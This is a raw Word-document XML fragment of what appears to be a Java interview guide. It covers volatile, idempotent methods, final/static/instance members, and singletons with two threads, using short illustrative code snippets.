          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is volatile in java? Where can we use it</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="74B966DA" w14:textId="00599C7D" w:rsidR="00451C36" w:rsidRPr="00CE4B95"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Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a variable is declared as volatile, it tells the Java Virtual Machine (JVM) that the value of the variable may be changed by multiple threads and that it should always fetch the latest value from the main memory rather than relying on local thread caches (which might not have the most recent value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BEC40"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Visibility Guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1EFFF"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: volatile guarantees </w:t>
      </w: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oes not guarantee atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, operations like increment (i++) or check-modify (check, modify) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not atomic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> even if the variable is volatile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA242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volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD901D7"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nt myVariable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F289EF9"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volatile work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646798B0"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variable is declared as volatile, the JVM ensures that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755976CB"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en to Use volatile?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0C9F1"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s typically used in the following scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E00AC6"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g Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00451C36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 Across Threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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F87FE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F2F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8D10F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5A4E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toggle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6EE3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ggle the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439D9F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F164F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BAE76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4BBFBE"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g</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07C2C1"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71AC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B857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BBDD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examp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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E768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263DA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1: Toggle the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1858B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0FE9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ggleFlag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872346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read 1 toggled the flag"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305021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209C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2E7A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2: Print the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1CF93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910EC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F13F7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aiting for the flag to be true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D6BA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B816B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ill print "Flag: true" once the flag is toggled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C995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45CA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8435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BF83758"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C6FEF7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420FB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5A62439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06C6C1D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1F04E" w14:textId="028100FC"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E84552"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0B83D53"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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> waits until flag becomes true before printing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715472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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggles the value of flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657B79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volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6165A3F1"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 Not Guaranteed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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synchronized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AF296"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ynchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It guarantees both visibility </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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4684B7D"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volatile keyword in Java when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024EA94"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CE4B95"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A96AB" w14:textId="1D3215C0" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="000B7329">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc197867255"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an idempotent method in java</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="36BA1AB0" w14:textId="5AB460E5" w:rsidR="00250232" w:rsidRPr="00CE4B95"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Idempotent Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5315E8"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Output for Same Input</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Additional Side Effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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 Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0956E"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89C20"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FA61B9"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583D7D7"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C209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dempotent method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7AC6E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update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E40E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7D7ADF"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p>
    <w:p w14:paraId="42DF8E7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9095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989C4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B0672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1F35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916F61"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AB21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3FA14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1B968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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A4D6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call, userName is set to "John"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2911A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all, no effect, as userName is already "John"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249749A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23E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A434826"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D93123" w14:textId="5B05591E"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C94FAC"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1B025BF1"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updateUserName method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Web Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02BB8A"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ontext of web services (RESTful APIs), idempotency is important. A typical example is </w:t>
      </w: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LETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E179E4"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LETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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t Operations in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75652E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examples of idempotent operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABD84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Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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the same value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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 Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Java's Concurrency and Distributed Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225781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dempotency is also a critical concept in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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211CA52" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="00CE4B95" w:rsidRDefault="00250232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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dempotent Message Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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E65A15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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2E44C" w14:textId="730706A3" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="002A2156">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc197867256"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is final, static and non-static (instance) in java</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3F00C980" w14:textId="2597BA80" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="007C48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static, and non-static (instance) in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3F043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inal in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989CA86"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final with Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E590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declare a variable as final, its value cannot be changed once it is initialized. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED4FF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B6265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_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8773E8C" w14:textId="4BD7F2A6"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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// MAX_VALUE = 200; // This will result in a compilation error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541B5FF" w14:textId="056C00AB" w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3DB6" w:rsidP="00CC3DB6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EFECA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final with Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAAFDC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7B0ABE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BFBF7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03B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s is a final method."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A7BF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76DB7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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF42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34E8F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D9B4C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ollowing line will cause a compile-time error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA065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void display() { }  // Cannot override the final method from Parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F6629" w14:textId="21027D0D"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457E3D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nal with Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC4C1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F2935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al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F47A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implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40153E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0A17742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0A82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The following will cause a compile-time error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29074DC2" w14:textId="22CA15A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class SubClass extends FinalClass {} // Cannot subclass a final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58188AB1"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in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D894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atic keyword is used to indicate that a particular member (field, method, or block) belongs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rather than any instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7847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tatic with Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37019AC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tatic variable is shared among all instances of the class. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common to all objects of that class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AA99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D1FD32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3959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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BEC4A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C269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7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 can be accessed without creating an instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EB4F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237D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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5C6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C171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1D5DF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9E2C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356DF2A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56024B3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0BEAA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34C2B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E77A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56DD51" w14:textId="67DE0054"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7CEA90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tatic with Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE819B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BD618A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7D662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C601E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0F43B2D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FC2B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A4E72B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94078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1F4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DFFF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uar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need to create an instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62693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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296B812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5940A" w14:textId="4EDFE525"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685BFD6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static with Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1646B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36258D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7592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3BD5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block is executed."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602408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7EC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FBD73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B437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block will be executed when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9511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8A0BF5" w14:textId="394E7393"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6163F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1E866C5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is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F6645A"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Non-Static (Instance) Members in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78748D0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say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we are referring to members that are specific to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>individual instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Non-Static Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D9E8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5DEC2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D9903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1E7F03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09B6E84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FA836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90C1F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56D10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410396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5CF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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAE5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463C6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73FC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A6E71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37FC853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6D8EA43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 - 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E655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lice - 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C182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ABAE" w14:textId="259423E2"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C97E9B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Non-Static Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B149E3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17F246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A4CBD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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D3F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58F4065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3094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DA69C17"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BEEEE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F7E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350BB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cal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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E4B6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lc</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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670BB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0ED1FA" w14:textId="3308D29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A0A526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E4B95" w14:paraId="1531912F" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19077157"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CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="776BDCB0" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="299B784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to each instance of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="4A4DE99A" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFE405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an instance of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3DB6" w:rsidRPr="00CE4B95" w14:paraId="1DD4856A" w14:textId="77777777" w:rsidTr="00CC3DB6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0798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r>
    </w:tbl>
    <w:p w14:paraId="7D0EE6FB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC02338"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non-static (instance)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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67" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE8763C" w14:textId="57C81B67" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E54CE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc197867257"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How will I use two threads using a singleton design pattern</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="27801192" w14:textId="47923284" w:rsidR="004D1701" w:rsidRPr="00CE4B95" w:rsidRDefault="004D1701" w:rsidP="000E5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order to use two threads with a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 Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5DD42"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Implement Singleton Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71032B51"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use Two Threads with Singleton Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E78B4"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 xml:space="preserve"> with thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333973D9"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two threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that access the Singleton instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E193C"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Design Pattern with Two Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BADEA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515CF5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C0F9E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Create a private static variable to hold the single instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640DC8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6159024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EBA4D5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Private constructor prevents instantiation from other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34F43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AC3D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Simulate some time-consuming task like DB initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488F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9AB5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time-consuming process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30014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CD3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B3A10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A0201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FADFA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62DB5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ublic method to provide access to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448571F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311D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for thread-safety</w:t>
      </w:r>
    </w:p>
